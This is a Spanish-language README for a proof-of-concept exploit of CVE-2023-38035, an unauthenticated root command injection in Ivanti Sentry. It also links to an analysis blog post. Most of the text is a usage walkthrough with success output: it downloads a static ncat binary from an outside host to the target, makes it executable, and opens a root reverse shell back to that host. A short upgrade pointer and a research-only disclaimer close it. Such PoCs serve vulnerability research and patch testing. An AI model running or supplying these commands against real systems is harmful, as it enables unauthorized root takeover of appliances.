
Ivanti Sentry CVE-2023-38035
POC de CVE-2023-38035 que afecta a Ivanti Sentry
Se puede encontrar un análisis técnico de la causa raíz de la vulnerabilidad en nuestro blog: https://www.horizon3.ai/ivanti-sentry-authentication-bypass-cve-2023-38035-deep-dive
Este POC aprovecha una inyección de comandos no autenticada para ejecutar comandos arbitrarios como usuario root.
El contexto de ejecución no permite la canalización de comandos, y el sistema no incluye binarios fácilmente explotables, por lo que los comandos se pueden encadenar para descargar un ncat estático desde algún lugar como https://github.com/andrew-d/static-binaries/blob/master/binaries/linux/x86_64/ncat.
python3 CVE-2023-38035.py -u https://<target>:8443/ -c 'wget http://123.123.123.123:8000/ncat -O /tmp/ncat'
[+] Successfully executed command on target!
python3 CVE-2023-38035.py -u https://<target>:8443/ -c 'chmod +x /tmp/ncat'
[+] Successfully executed command on target!
python3 CVE-2023-38035.py -u https://<target>:8443/ -c 'sudo /tmp/ncat 123.123.123.123 4444 -e /bin/sh'
[+] Successfully executed command on target!

Actualice a la última versión según las instrucciones del aviso de Ivanti:
Este software ha sido creado únicamente con fines de investigación académica y para el desarrollo de técnicas defensivas efectivas, y no está destinado a ser utilizado para atacar sistemas excepto cuando esté explícitamente autorizado. Los mantenedores del proyecto no son responsables del uso indebido del software. Úselo de manera responsable.